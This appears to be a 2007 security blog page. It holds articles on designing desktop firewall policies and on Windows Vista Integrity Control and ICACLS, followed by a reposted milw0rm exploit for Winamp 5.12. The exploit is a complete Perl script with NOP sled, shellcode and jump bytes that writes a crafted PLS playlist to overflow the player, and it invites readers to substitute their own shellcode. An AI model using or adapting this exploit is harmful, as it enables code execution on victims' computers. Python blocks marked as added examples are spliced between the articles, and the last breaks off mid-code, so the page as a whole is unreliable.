Wednesday, March 28, 2007

Standards in desktop firewall policies (Part 2)

Benefits of a desktop firewall policy

  • The ability to predict the impact of security-related events is enhanced. An event could have many characteristics and take on many different forms. If some of those characteristics involve network port access, the policy may offer an initial form of protection. In addition, network-oriented responses to these events become more predictable. For example, router and network firewall ACLs are sometimes applied to deter the propagation of viruses and worms. The problem is that implementing such ACLs could impact production software in cases where an application and a security event have similar port requirements. Depending on the characteristics of the event, the example policy may make ACLs unnecessary on some network segments.

  • Provide consistent software solutions (as opposed to multiple solutions that provide the same function). Two departments requiring a similar service may deploy two different software solutions. While it is best that departments in any organization coordinate the development and deployment of software solutions, the reality is that this doesn't always happen. The example policy offers some hurdles for new applications. If the policy happens to conflict with the network requirements of an application, a policy enhancement would have to be requested. At this point, if not already, the application becomes known to the organization.

  • Restrict the ability of network-oriented programs to reach the desktop until they have been evaluated. Again, the policy may offer some new hurdles for applications, depending on their requirements. A recent example is Microsoft's ActiveSync 4.0 software. The example policy would require modifications, which could be loose or tight. (Visit Microsoft's ActiveSync page for the requirements.) The policy impacts the application in several areas: inbound port requirements and backend network construction, both of which involve the use of UDP along with TCP. A modification of the policy may include a fairly tight rule that binds the local ports to the application for the backend network only, such as:

      allow 169.254.2.1 inbound access to the { required ports } AND { executables }

    Analysis of the application with Nmap can verify the port requirements on the backend network, but it also reveals activity on the primary network. In this case a 'status' port, TCP 999, becomes active on the primary network when the handheld that uses ActiveSync is cradled. In theory one could run a single port scan against port 999 on a subnet and identify all IP addresses that are currently 'syncing' a handheld. Depending on the firewall internals and the policy defined, Nmap may report port 999 as 'closed'. Some firewalls can be configured to drop an inbound packet for a port that is blocked, which would return nothing in this case.

  • Restrict the use of service-oriented software. Anyone involved in or concerned with security should take an interest in this, and may even be frustrated by it. Software running on an ordinary desktop (as opposed to a 'server') that requires a listening port could be susceptible to coding errors that allow inbound access, or to backdoors. Such software should be avoided.

  • Software using unusual protocols will become known (such as systems using the streaming protocol IGMP). While the use of protocols other than IP isn't itself an issue, it's an advantage to know they are in use. Some firewalls will not pass these protocols, and isolating their use could be difficult. It's now common for the software provider or vendor to make their networking requirements available to organizations supporting a desktop firewall.

  • Track the use of broadcast-oriented software, which usually runs over UDP. The example policy in this article would disable the response to a UDP broadcast. A good standard for any organization is to define service-oriented equipment, such as printers and scanners, using static IP addresses, and to make users aware of the names and IP addresses of the facilities in their area. The security issue in this case is that the service could be spoofed: a phony print server could be created to capture printouts and forward them to the actual server.

  • Track the use of backend networks or dual-homed machines. The example policy may reveal a backend, depending on what it is being used for. The use of backend networks won't directly cause security concerns, but their existence and use should be identified. For example, asset and patch management could be impacted, and real vulnerability assessment would also not be possible.

  • Software and desktop support can be impacted and simplified. The example policy offers some limitations on what software can do on the network. Software requiring modifications to the policy obviously becomes known, and the specific policy modifications would help create a consistent deployment.

  • The example policy would help in the enforcement of the organization's security policies, or in the detection of software that might break them. For example, it may be part of the security policy to prohibit the use of database, web, FTP or P2P servers on ordinary desktops. The policy in this example would block those services.

  • A global policy could help enforce an organization's specific standards, such as the use of a remote access VPN or streaming media solution. The example policy would most likely require modifications to support VPN. Typically the software requirements of VPN clients differ between vendors as well.

  • The policy could be used to limit access to services running over non-standard ports. For example, assume that only minimal outbound Internet access restrictions are in place, and that a policy and mechanism exist to monitor and log Internet web access. Typically web access uses TCP port 80. However, it is possible for a user to reach an external anonymous web proxy (such as www.proxyblind.org; there are many others) that may run on a port other than 80. This usage would bypass logging and allow the user to surf the web anonymously. A modification to our example policy restricting iexplore.exe to outbound TCP port 80 could be created. Limitations on other ports commonly used by anonymous web proxies could also be created (for example, these are often found on TCP ports 3128, 8000 and 8080).

Summary

A common desktop firewall policy could lead to, or help in the enforcement of, software networking standards. If this is something an organization wants, there are clear benefits. Depending on whether the organization is running a firewall with a consistent policy or not, networking standards at some level may already be enforced. New applications may or may not be compatible with this policy, and changes or modifications would need to be requested. Those who deploy new software may need to be a bit more familiar with the network requirements of their software, to be able to adhere to policy.

The desktop firewall, typically just one piece of desktop security, is often combined with patch management, anti-virus and software deployment/management facilities to form a complete security solution. As part of that solution, the desktop firewall's job is simply to block network traffic and detect attacks. Yet the reality is that it can do more than this, although the added benefits may not be quite as tangible as basic desktop protection.

The implementation and maintenance of a desktop firewall can be a stressful and frustrating experience – particularly for organizations that do not have a full understanding of their own network requirements. It can cause existing software to stop working. It could require deployment dates to be extended because of the additional development time needed to isolate compatibility issues. It may require additional resources or steps to get software to the desktop.

Conclusion

In this article we discussed the need for a desktop firewall policy within an organization. We discussed how such a policy should be formed and then provided an example, along with a detailed discussion of the security benefits it offers an organization.

An old school of thought would resist any restrictions placed on internal network access. But today the stakes are higher, and security is paramount. At some point in the history of networked computing, organizations became more accountable for their network traffic and for the legality of the software they choose to run. Not many options are available for limiting the use of the network (beyond simply blocking it at the usual choke points, which doesn't allow specific applications to be controlled). This approach needs to change, as more and more attacks and security concerns come from the soft underbelly of the organization's internal network.

by Phil Kostenbader, CISSP, and Bob Donnelly, CISM, CISSP

Standards in desktop firewall policies (Part 1)

The idea of a common desktop firewall policy in an organization of any size is a very good thing. It makes responses to external or internal situations, such as virus outbreaks or network-oriented propagation of viruses, more predictable. In addition to providing a level of protection against port scanning, attacks or software vulnerabilities, it can give the organization's local security team a baseline or starting point for dealing with such events.

The purpose of this article is to discuss the need for a desktop firewall policy within an organization, determine how it should be formed, and provide an example of one along with the security benefits it provides an organization.

The Problem

The trick to a good desktop firewall policy is to provide a balance between security and the networking requirements of the applications needed by the organization. It's possible the organization may not yet have a complete knowledge of these requirements. This should make the first attempt to define a standard/global policy interesting, depending on the level of protection one is trying to provide and the situation or environment the desktops may be in.

One thought on an initial policy is to provide a port-based firewall with all inbound ports blocked on the desktop. On the other hand, an old school of thought might involve blocking only the ports that need to be blocked, by estimating software network requirements and then combining this with an effort to block the most obvious of possible vulnerabilities or services. Evaluating FTP, Windows IIS or NetBIOS requirements might provide a first pass at a standard global policy. Our old school of thought again would leave the balance tipped toward the (as yet unknown) network requirements of the software, and less toward protection. In other words, it offers functionality over security. While providing consistency, cases where the desktop (or laptop) is located off site may not fully satisfy the security requirements of the organization.

Location awareness may be a feature of the desktop firewall that one could use to design a policy that changes to better fit a user's location. Some personal firewall solutions provide location awareness as a feature. The location could be selected automatically based on a successful Windows domain login, a specific IP address, a DNS server address, the network adapter type, or the client firewall's ability to connect to a policy manager.

If location awareness is not a built-in feature of the firewall, the policy could be designed around the organization's internal IP address range or, if available, be configured around the DNS domain name. For example:

allow all inbound *.someorganization.org

Issues with a "block all" inbound policy

A block-all-inbound policy while connected offsite would seem to present the least amount of risk, but might not be completely possible while onsite. The first issue may be caused by the firewall itself. Depending on the vendor, characteristics of the firewall may impact application functionality while using a block-all-inbound policy. This may include UDP, complex protocols like FTP, NFS, applications running in a service mode, and problems with an Intrusion Prevention System if one is provided with the firewall. Each of these issues is discussed below.

UDP, being a stateless protocol, is difficult for any firewall to handle. A simple UDP-based service may run on port 1313, for example. The UDP client (running the desktop firewall) would send to port 1313 and assign a local port for a reply. There may or may not be a reply; if there is, it won't be easy for the firewall to determine whether or not to allow it. Either the firewall needs to attempt to keep state of all outbound UDP traffic on its own, or the UDP port requirements must be known and the firewall configured to allow the reply on a case-by-case basis.

An example of a facility requiring UDP might be a printer or scanner client that issues a UDP broadcast and then awaits a reply. That reply would come from a scanner or printer the user may want to access, and it might include its status or availability.

FTP could cause another possible issue with the firewall. In some cases the firewall may not support active FTP, which is unusual since Microsoft Windows doesn't support passive mode. Active FTP is where the FTP server initiates a connection back to the client to do the actual transfer of data. Oddly, FTP is still used and sometimes even embedded within other software. Fixes for active FTP on firewalls can be ugly and may end up being one of the first application-based rules.

Applications running in a service mode can have one of two solutions: either the firewall requires an application-based rule where the application's network access is restricted to predefined ports, or one can simply allow the open port, possibly with some other restricting criteria. Restrictions by IP address or time of day are possible as well, and may be desired.

An Intrusion Prevention System may be an additional feature of a desktop firewall within an enterprise. This would allow the firewall to detect possible attacks by examining the inbound packet and matching data and port usage against a list of known attack signatures. The IPS may be configured to respond by blocking the inbound packet, or by allowing it and sending an alert. False positives on a firewall supporting IPS could mistakenly block inbound traffic and would need to be analyzed and adjusted on a case-by-case basis. Logging the event and allowing the traffic may be the quickest and easiest way to deal with false positives.

The Environment

In this part of the article, we detail what is needed to create an environment where software requirements are known and our corporate standards are enforced:

  1. A desktop firewall. This is the tool used to enforce restrictions on network access by limiting port and protocol access. The firewall should limit the user's ability to change its configuration, yet provide enough function that the user can identify issues that may be caused by the firewall policy. The firewall should support port- and application-based filtering.
  2. A security policy. This will define what is or is not permitted to or from the network on a standard desktop. Typically this would be generated by a high-ranking security group or set of officials in the organization, and would be generalized into a non-technical document (it could be as simple as a block-all-inbound rule).
  3. Knowledge of existing port requirements, or a baseline of requirements. These would be taken from the standard or default desktop operating system configuration used in the organization. Typically an organization would have an install tailored to its own requirements, and it may include patches, anti-virus, and common software required by all users. This, combined with the security policy, would form the basic desktop firewall policy.
  4. Ability to deploy a single global firewall solution to all desktops. This means deploying the solution to all desktops in the organization with a consistent or single policy. Enforcement and tracking of deployment would also be necessary.
  5. Facility to provide and update the firewall policy. Some firewalls can be centrally managed directly. Depending on the needs or structure of the organization, the minimum requirement would be a common/global firewall policy that can be updated, for example through the replacement of a configuration file. Obviously some form of central software management would need to be in place.
  6. Large plastic bat to handle upset users.
  7. Tools to aid in the analysis of the networking requirements. For example, this might include Ethereal for monitoring traffic, the ability to analyze firewall logs, Perl scripts to test firewall rules, Nmap for port scanning, and so on.

"Software Networking Standards" – A potential benefit
An example

If the organization knows the networking requirements of its applications, a policy could easily be created. The idea of software networking standards could then be enforced through the policy. In order to provide a firewall policy for the examples below, let's first assume that a policy is designed and configured to block all inbound TCP/UDP and allow all outbound TCP/UDP. We will also assume the firewall does not properly handle outbound UDP or complex protocols such as FTP. Some known software requirements in this environment may be obvious; for example, suppose the organization permits file sharing. This would require inbound TCP port 445 to be open. A rule is created to support inbound 445 and also restrict the rule to a range of IP addresses (192.168.4.0 through 192.168.20.255 in this example, with the understanding that this private IP address range could be used by other organizations such as hotels as well, creating a potential hole for traveling users). Finally, ICMP is allowed for troubleshooting. A sample policy might thus be configured to:

  • Allow all inbound and outbound ICMP
  • Allow inbound TCP 445 from hosts 192.168.4.0 – 192.168.20.255
  • Block all inbound TCP
  • Block all inbound UDP
  • Allow all outbound TCP
  • Allow all outbound UDP

Let's now look at the benefits of using our sample policy.
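The sample policy just listed, the application-bound rule and the iexplore.exe restriction to outbound TCP 80 from Part 2, and the unpaired UDP reply from "Issues with a block all inbound policy", worked through in a small first-match evaluator. This is an added example, not the authors' code or any vendor's firewall engine; the Rule and Packet layouts, the executable names and the sample packets are constructed.

```python
"""Evaluator for the article's sample desktop firewall policy (added example,
not the article's code). Rule/Packet layouts and sample packets are constructed."""
from dataclasses import dataclass
from ipaddress import ip_address
from typing import Dict, List, Optional, Set, Tuple

@dataclass(frozen=True)
class Rule:
    action: str                      # "allow" or "block"
    direction: Optional[str] = None  # "in", "out", or None for either
    proto: Optional[str] = None      # "tcp", "udp", "icmp", or None for any
    port: Optional[int] = None       # local port for "in", remote port for "out"
    src_lo: Optional[str] = None     # inclusive remote-address range, if any
    src_hi: Optional[str] = None
    app: Optional[str] = None        # executable the rule is bound to, if any

@dataclass(frozen=True)
class Packet:
    direction: str                   # "in" or "out"
    proto: str
    remote_ip: str
    remote_port: int
    local_port: int
    app: str = ""                    # local executable owning the socket

def rule_matches(rule: Rule, pkt: Packet) -> bool:
    """True when every field the rule specifies agrees with the packet."""
    if rule.direction and rule.direction != pkt.direction:
        return False
    if rule.proto and rule.proto != pkt.proto:
        return False
    if rule.port is not None:
        named = pkt.local_port if pkt.direction == "in" else pkt.remote_port
        if named != rule.port:
            return False
    if rule.src_lo is not None:
        ip = ip_address(pkt.remote_ip)
        if not ip_address(rule.src_lo) <= ip <= ip_address(rule.src_hi):
            return False
    if rule.app and rule.app != pkt.app:
        return False
    return True

class DesktopFirewall:
    """First match wins; unmatched traffic is blocked. track_udp=False models
    the article's assumption that UDP replies cannot be paired with requests."""

    def __init__(self, rules: List[Rule], track_udp: bool = False):
        self.rules = list(rules)
        self.track_udp = track_udp
        self._udp_flows: Set[Tuple[str, int, int]] = set()

    def decide(self, pkt: Packet) -> str:
        flow = (pkt.remote_ip, pkt.remote_port, pkt.local_port)
        if self.track_udp and pkt.proto == "udp" and pkt.direction == "in":
            if flow in self._udp_flows:
                return "allow"           # reply to a request we let out
        for rule in self.rules:
            if rule_matches(rule, pkt):
                if (rule.action == "allow" and pkt.proto == "udp"
                        and pkt.direction == "out"):
                    self._udp_flows.add(flow)
                return rule.action
        return "block"

# The article's sample policy, in the order listed.
SAMPLE_POLICY = [
    Rule("allow", proto="icmp"),
    Rule("allow", "in", "tcp", 445, "192.168.4.0", "192.168.20.255"),
    Rule("block", "in", "tcp"),
    Rule("block", "in", "udp"),
    Rule("allow", "out", "tcp"),
    Rule("allow", "out", "udp"),
]

# Part 2's modification: the browser may only reach TCP 80, so an external
# proxy on 3128/8000/8080 is refused. App-bound rules go first (first-match).
PROXY_RESTRICTED_POLICY = [
    Rule("allow", "out", "tcp", 80, app="iexplore.exe"),
    Rule("block", "out", "tcp", app="iexplore.exe"),
] + SAMPLE_POLICY

def run_scenarios(track_udp: bool = False) -> Dict[str, str]:
    """Decisions for constructed packets; all addresses are sample values."""
    fw = DesktopFirewall(PROXY_RESTRICTED_POLICY, track_udp=track_udp)
    cases = {
        "smb_inside": Packet("in", "tcp", "192.168.10.7", 49152, 445),
        # same private range on a hotel LAN: the hole the article warns of
        "smb_hotel_lan": Packet("in", "tcp", "192.168.5.9", 49152, 445),
        "smb_other_net": Packet("in", "tcp", "10.1.2.3", 49152, 445),
        # the port-1313 UDP exchange from Part 1; reply follows request
        "udp_request": Packet("out", "udp", "192.168.7.2", 1313, 50000),
        "udp_reply": Packet("in", "udp", "192.168.7.2", 1313, 50000),
        "browser_80": Packet("out", "tcp", "203.0.113.5", 80, 50001, "iexplore.exe"),
        "browser_8080": Packet("out", "tcp", "203.0.113.5", 8080, 50002, "iexplore.exe"),
        "other_app_8080": Packet("out", "tcp", "203.0.113.5", 8080, 50003, "updater.exe"),
        "ping_reply": Packet("in", "icmp", "192.168.1.1", 0, 0),
    }
    return {name: fw.decide(pkt) for name, pkt in cases.items()}
```

Run `run_scenarios(False)` to see the article's assumptions in effect (the UDP reply is dropped even though the request went out) and `run_scenarios(True)` for a firewall that does keep UDP state.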

by Phil Kostenbader, CISSP, and Bob Donnelly, CISM, CISSP

Introduction to Windows Integrity Control (Part 2)

Tony Bradley, CISSP-ISSAP 2007-02-02

In Windows XP or older systems, whether or not the malware succeeds is more or less a function of the rights and privileges of the logged in user and whether or not the system and Registry have been hardened or protected in any way to block such attempts. With Vista, because everything related to the Internet runs at a Low integrity level, the malware will be unable to modify, delete or interact with virtually anything else on the system.

These protections shield Vista systems from the vast majority of malware. Most of the time, users now become compromised or infected by malware through visiting malicious web sites or opening email file attachments. The same protection does not apply, however, when a user brings in files on CD, DVD, USB drive or other removable media. Those files will execute in the context of the integrity level of the logged-in user.

Using Protected Mode

The automatic designation of Low integrity relies on Internet Explorer running in Protected Mode. Protected Mode has been hyped as one of the significant security updates in Windows Vista and in Internet Explorer 7. As long as Protected Mode is on, everything that Internet Explorer does is assigned Low integrity by default.

Some sites may not function properly with the restrictions imposed by Protected Mode. It is possible, on the Security tab of the Internet Options configuration console, to uncheck the option to ‘Enable Protected Mode’. Doing so removes most of the protection Vista provides against unauthorized or malicious activities via the Internet though, so it is highly recommended that you leave Protected Mode on.

In an enterprise, the ability to enable or disable Protected Mode can, and should, be removed using Group Policy. For individual users, rather than disabling Protected Mode to access sites that have issues, simply add those sites to the Trusted security zone in Internet Explorer. Each security zone in Internet Explorer has its own unique security configuration, and the Trusted zone runs with Protected Mode disabled by default.

Using ICACLS to view integrity levels

One of the issues that Administrators typically run into when dealing with rights and permissions in a Windows environment is figuring out who has access to what. If a process fails, a file won’t execute, or a user can’t write data to a folder, one of the troubleshooting methods might be to examine the WIC integrity level of the object in question and of the object it is trying to act on, to determine whether WIC is behind the failure.

Windows Vista does not provide anything slick or pretty to let you view or alter the integrity level of an object. There is, however, a command line utility called ICACLS which will display the contents of the discretionary ACL, as well as mandatory labels. As stated earlier, objects that are not explicitly assigned a label are automatically designated as Medium integrity; however, the Medium integrity label won’t show up in ICACLS output because it is implied rather than explicit.

To use the ICACLS utility, you first need to open a command prompt window. There are a number of switches and syntax possibilities to use with the ICACLS tool. You can get information and details on each of the options and examples of their uses by simply typing ‘icacls’ at the command prompt and hitting Enter. We will focus on two uses of ICACLS here.

First, viewing the integrity level. To view the integrity level, and other contents of the discretionary access list, type icacls followed by the path of the object you wish to examine. For example, if you wish to view the mandatory integrity level of the explorer.exe file, you would type icacls c:\windows\explorer.exe. The results will look like this:

    C:\windows\explorer.exe NT SERVICE\TrustedInstaller:(F)
                            BUILTIN\Administrators:(RX)
                            NT AUTHORITY\SYSTEM:(RX)
                            BUILTIN\Users:(RX)

As mentioned above, the mandatory integrity level assigned to the explorer.exe file is implied by the fact that it does not have a specific mandatory integrity level assigned. If there were a mandatory integrity level, there would be an additional entry that would look like this:

    Mandatory Label\Medium Mandatory Level

Just keep in mind that if you are using ICACLS to try and determine the mandatory integrity level being used to determine object interactions in WIC, no mandatory label entry means that it is a Medium by default.

It is also possible to change an object’s integrity level using ICACLS. To do so, a user must be assigned the SeRelabelPrivilege. In order to change the integrity level of an object, the user needs the authority to “change permissions” as well as “take ownership” of the target object. As long as these privileges are in place, a user may modify or elevate the integrity level of an object. However, the user can never set the object to a higher integrity level than their own.

Assuming you have the proper permissions and privileges, you can modify the mandatory integrity level of an object with the ICACLS tool by typing icacls <path> /setintegritylevel H|M|L, where <path> is the object to relabel. The label at the end, either H, M or L, assigns a mandatory integrity level of High, Medium or Low to the specified object respectively.
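To make the "no label means Medium" rule and the mandatory check concrete, here is a small parser for ICACLS output combined with the six-level ordering from Part 1 (further down this page). This is an added example, not the article's or Microsoft's code; the explorer.exe listing is the one shown above, the Low-labelled folder listing is constructed, and the parser assumes object paths without spaces.

```python
"""Recover an object's WIC integrity level from ICACLS output and apply the
level ordering from Part 1 (added example, not the article's or Microsoft's
code; the Low-labelled listing is constructed)."""
import re
from typing import List, Optional, Tuple

# Least to most trusted, as listed in Part 1 of the article.
LEVELS = ["Untrusted", "Low", "Medium", "High", "System", "Installer"]
RANK = {name: i for i, name in enumerate(LEVELS)}
LABEL_RE = re.compile(r"Mandatory Label\\(\w+) Mandatory Level")
PATH_RE = re.compile(r"^[A-Za-z]:\\\S* ")   # drive path without spaces, then ACE


def parse_icacls(output: str) -> Tuple[List[str], Optional[str]]:
    """Split one object's ICACLS listing into its DACL entries and the explicit
    integrity label, if any. ICACLS prints the path in front of the first ACE
    and indents the rest; this parser assumes the path contains no spaces."""
    aces, label = [], None
    for line in output.splitlines():
        line = line.strip()
        if not line or line.startswith("Successfully processed"):
            continue                         # blank line or the ICACLS footer
        m = LABEL_RE.search(line)
        if m:
            label = m.group(1)               # "Low", "Medium", "High", ...
            continue
        aces.append(PATH_RE.sub("", line, count=1))
    return aces, label


def integrity_level(output: str) -> str:
    """The level WIC applies to the object: the explicit label when one is
    printed, otherwise Medium, which ICACLS never shows because it is implied."""
    return parse_icacls(output)[1] or "Medium"


def may_modify(subject_level: str, object_level: str) -> bool:
    """WIC's mandatory check, evaluated before the DACL: a subject may modify an
    object only if its level is at least the object's. Full Control in the DACL
    cannot overturn a False here."""
    return RANK[subject_level] >= RANK[object_level]


def check_write(subject_level: str, output: str) -> bool:
    """Would a process at subject_level pass WIC's check to write this object?"""
    return may_modify(subject_level, integrity_level(output))


def relabel_command(path: str, level: str) -> str:
    """The ICACLS invocation Part 2 describes for changing a label; the caller
    needs SeRelabelPrivilege and cannot set a level above its own."""
    letter = {"High": "H", "Medium": "M", "Low": "L"}[level]
    return f'icacls "{path}" /setintegritylevel {letter}'


# The article's explorer.exe listing: no mandatory label, so Medium.
EXPLORER_LISTING = r"""C:\windows\explorer.exe NT SERVICE\TrustedInstaller:(F)
                        BUILTIN\Administrators:(RX)
                        NT AUTHORITY\SYSTEM:(RX)
                        BUILTIN\Users:(RX)
Successfully processed 1 files; Failed processing 0 files"""

# Constructed listing for a folder labelled Low, the way Protected Mode's
# scratch folders are; (NW) is the no-write-up policy ICACLS prints.
LOW_FOLDER_LISTING = r"""C:\Temp\Low BUILTIN\Users:(OI)(CI)(F)
             Mandatory Label\Low Mandatory Level:(OI)(CI)(NW)
Successfully processed 1 files; Failed processing 0 files"""
```

`check_write("Low", EXPLORER_LISTING)` is False even though the DACL grants Users read/execute and an administrator Full Control elsewhere: the integrity comparison runs first.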

Safer and more secure with WIC

When it comes to securing data on a Windows-based computer, one of the most unpredictable and uncontrollable variables is the human component. Organizations have started to realize that users cannot be relied upon to properly classify and encrypt sensitive information, so there is a growing trend to implement whole disk encryption, especially on mobile computing devices, and remove that variable.

Windows Integrity Control operates from a similar perspective. Users may have the ability to own files and folders and assign rights and privileges regarding which groups or individuals should be allowed to view, modify, delete, or otherwise perform actions on them. However, the user’s discretion cannot always be relied upon; therefore discretionary access controls cannot be relied upon to protect the objects in question.

With WIC, Microsoft has added the concept of mandatory access controls which are more or less set by the operating system, and trump, or override the discretionary access controls. Segregating all files and processes that originate from the Internet and prohibiting them from interacting with or modifying files or objects on the system help to make the system more secure when surfing the Web.

WIC is not a silver bullet. There are some improvements that could be made, for example providing a better management and configuration tool than the ICACLS command line tool. The security provided by WIC is not perfect, but it is superior to the current Windows security model and helps protect a Vista system from many threats which could impact Windows XP, Windows 2000 or older operating systems.

Further reading

Mandatory Integrity Control in Windows Vista:
http://blogs.technet.com/steriley/archive/2006/07/21/442870.aspx

First Look: New Security Features in Windows Vista:
http://www.microsoft.com/technet/technetmag/issues/2006/05/FirstLook/default.aspx

Protected Mode in Vista IE7:
http://blogs.msdn.com/ie/archive/2006/02/09/528963.aspx

Why Vista? Mandatory Integrity Control (MIC) (Security, Stability, System Integrity):
http://adopenstatic.com/cs/blogs/ken/archive/2006/08/18/Why-Vista_3F00_-Mandatory-Integrity-Control-_2800_MIC_2900_-_2800_Security_2C00_-Stability_2C00_-System-Integrity_2900_.aspx

Introduction to Windows Integrity Control (Part 1)

Tony Bradley, CISSP-ISSAP 2007-02-02

This article takes a look at the Windows Integrity Control (WIC) capabilities in Windows Vista by examining how it protects objects such as files and folders on Vista computers, the different levels of protection offered, and how administrators can control WIC using the ICACLS command-line tool. WIC is intended to protect a system from malware and user error by helping to establish different levels of trust on objects.

System integrity - Who can you trust?

When the developers at Microsoft set out to create the latest version of their operating system, Windows Vista, they set out to ensure it was the most secure version of Windows yet. One of the functions that has been built in to Windows Vista which helps to make it more secure is Windows Integrity Control, or WIC.

The purpose of WIC is to protect objects, whether they are files, printers, named pipes, registry keys, and so on from attacks, malware or even innocent user error. The concept of WIC is based on establishing the trustworthiness of the various objects and controlling the interactions between objects based on their integrity, or level of trustworthiness.

The integrity levels of WIC are a mandatory control and override discretionary controls such as NTFS file and folder permissions which most administrators are familiar with. The primary objective of WIC is to ensure that only objects with an integrity level equal to or greater than the target object are allowed to interact with it. Essentially, if an object is less trustworthy, it is prohibited from acting on, or interacting with more trustworthy objects.

Again, WIC trumps normal permissions. That means that even if a file or process has Full Control permissions to another object, if the file or process has a lower integrity level than the object it is trying to interact with WIC will override the permissions and the interaction will be denied.

Determining trustworthiness using WIC

In order to police the interactions between objects, Windows must first determine the trustworthiness, or integrity level of each object. WIC assigns one of the following six integrity levels to each object:

  • Untrusted – processes that are logged on anonymously are automatically designated as Untrusted
  • Low – The Low integrity level is the level used by default for interaction with the Internet. As long as Internet Explorer is run in its default state, Protected Mode, all files and processes associated with it are assigned the Low integrity level. Some folders, such as the Temporary Internet Folder, are also assigned the Low integrity level by default.
  • Medium – Medium is the context that most objects will run in. Standard users receive the Medium integrity level, and any object not explicitly designated with a lower or higher integrity level is Medium by default.
  • High – Administrators are granted the High integrity level. This ensures that Administrators are capable of interacting with and modifying objects assigned Medium or Low integrity levels, but can also act on other objects with a High integrity level, which standard users cannot do.
  • System – As the name implies, the System integrity level is reserved for the system. The Windows kernel and core services are granted the System integrity level. Being even higher than the High integrity level of Administrators protects these core functions from being affected or compromised even by Administrators.
  • Installer – The Installer integrity level is a special case and is the highest of all integrity levels. By virtue of being equal to or higher than all other WIC integrity levels, objects assigned the Installer integrity level are also able to uninstall all other objects.

In terms of the impact on Windows Vista security, these integrity levels and WIC protect objects from intentional or unintentional modification or deletion by less trusted objects. By setting the Medium integrity level as the default mode for standard users and for all unlabeled objects, Vista protects the majority of objects on the computer from being affected in any way by threats from the Internet, which run at the Low integrity level by default.

Similarly, although Administrators are more powerful than standard users and operate at the High integrity level, the operating system kernel and core functionality receive a higher System integrity level, ensuring that even an absent-minded Administrator or compromised Administrator account can not adversely impact the core system.

To reiterate, the WIC integrity levels and controls are very similar to normal NTFS file and folder permissions. The primary difference is that NTFS permissions are discretionary controls while WIC integrity levels are mandatory controls. Basically, file and folder access privileges and permissions are assigned by the object owner or an administrator, while WIC integrity levels are dictated by the operating system.

While the upper four levels receive little practical use, the differentiation between Low integrity and Medium integrity is where the majority of WIC’s functionality lies. Implementing mandatory controls rather than relying only on the discretion of users or administrators certainly provides more security at all levels. But, the ability to segregate files and processes from the Internet and protect the computer from Internet-borne malware is one of the primary reasons for the existence of WIC.

Protecting Vista from Internet threats

While standard users operate at a Medium integrity level and Administrators are designated as High integrity, WIC assumes that the Internet, and any associated files or processes, are completely untrustworthy and assigns them a Low integrity level by default.

When a user receives an email with a link to a malicious web site (the sort of email they have been told a thousand times to delete), and he clicks on it, the malicious web site may attempt to install some sort of nasty malware. The malware will typically copy itself to some location on the hard drive and modify Registry keys to ensure its continued existence. It may also try to modify or delete other files or execute processes to initiate other malicious activity.

Sunday, March 25, 2007

Winamp Buffer Overflow Exploit (Crafted PLS)

Winamp is "a proprietary media player written by Nullsoft, a subsidiary of Time Warner. It is skinnable, multi-format freeware / shareware".

Winamp 5.12 is vulnerable to a buffer overflow when it tries to open a maliciously crafted PLS playlist file.

Credit:

The information has been provided by milw0rm.
The original article can be found at:
http://www.milw0rm.com/exploits/3422

Vulnerable Systems:

* Winamp versions 5.12 and prior

Exploit:
#!/usr/bin/perl -w
# ==================================
# Winamp 5.12 Playlist UNC Path Computer Name Overflow Perl Exploit
# By Umesh Wanve (umesh_345@yahoo.com)
# ===================================
# Credits : ATmaCA is credited with the discovery of this vulnerability.
#
# Date : 07-03-2007
#
# Tested on Windows 2000 SP4 Server English
# Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
#
# Buffer = "\x90 x 1023" + EIP
#
# Desc: you cant put shellcode after EIP. No more space after this. The winamp simply crashes. When you debug it, you will see that
# shellcode is 304 bytes away from ESP. So jump to esp + 304 should work. Find such address if u can.
#
#
# This was written for educational purpose. Use it at your own risk.Author will be not be responsible for any damage.
#
#
#=================================

#jump to shellcode
$jmp="\x61\xD9\x02\x02".
"\x83\xEC\x34".
"\x83\xEC\x70".
"\xFF\xE4";


#\x83\xEC\x34 add esp ,34
#\xFF\xE4 jump esp

$nop="\x90" x 856;

$start= "[playlist]\r\nFile1=\\\\";
$end="\r\nTitle1=Winamp Exploit by Umesh\r\nLength1=512\r\nNumberOfEntries=1\r\nVersion=2\r\n";

#open calc.exe
$shellcode =
"\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02".
"\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\x02\xdd\x85\x08\x3e\x56\x72\x48".
"\x7a\xdc\xe1\xc6\x4d\xc5\x85\x12\x22\xdc\xe5\x04\x89\xe9\x85\x4c\xec\xec\xce\xd4".
"\xae\x59\xce\x39\x05\x1c\xc4\x40\x03\x1f\xe5\xb9\x39\x89\x2a\x49\x77\x38\x85\x12".
"\x26\xdc\xe5\x2b\x89\xd1\x45\xc6\x5d\xc1\x0f\xa6\x89\xc1\x85\x4c\xe9\x54\x52\x69".
"\x06\x1e\x3f\x8d\x66\x56\x4e\x7d\x87\x1d\x76\x41\x89\x9d\x02\xc6\x72\xc1\xa3\xc6".
"\x6a\xd5\xe5\x44\x89\x5d\xbe\x4d\x02\xdd\x85\x25\x3e\x82\x3f\xbb\x62\x8b\x87\xb5".
"\x81\x1d\x75\x1d\x6a\xa3\xd6\xaf\x71\xb5\x96\xb3\x88\xd3\x59\xb2\xe5\xbe\x6f\x21".
"\x61\xdd\x0e\x4d";



open (MYFILE, '>>poc.pls');

print MYFILE $start;

print MYFILE $nop; #856

print MYFILE $shellcode; #165

print MYFILE "\xCC\xCC"; #2 bytes

print MYFILE $jmp; # EIP

print MYFILE "\x90\x90\x90\x90";

print MYFILE $end;


close (MYFILE);
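A defensive counterpart, added here and not part of the milw0rm advisory or its exploit: a small Python checker that parses a PLS playlist and flags FileN entries whose UNC computer name is oversized or contains non-printable bytes, which is the shape of the crafted playlist above. The sample playlists, the 255-byte host-name limit and the check_pls/unc_host names are this example's own choices, not anything from the advisory.

```python
"""Flag PLS playlists whose UNC paths carry an impossible computer name.

Added example (not the advisory's code). Winamp 5.12 overflows on the
computer-name component of a FileN=\\... entry, so a gateway or mail
filter can reject playlists whose host name could never be legitimate.
"""
import re
from typing import List, Optional

# A DNS host name is at most 255 bytes (a NetBIOS name at most 15), so
# anything longer in a UNC path cannot name a real server.
MAX_UNC_HOST = 255

# FileN=<path> lines; a bytes regex because a crafted playlist is binary.
ENTRY_RE = re.compile(rb"^File(\d+)=(.*)$")


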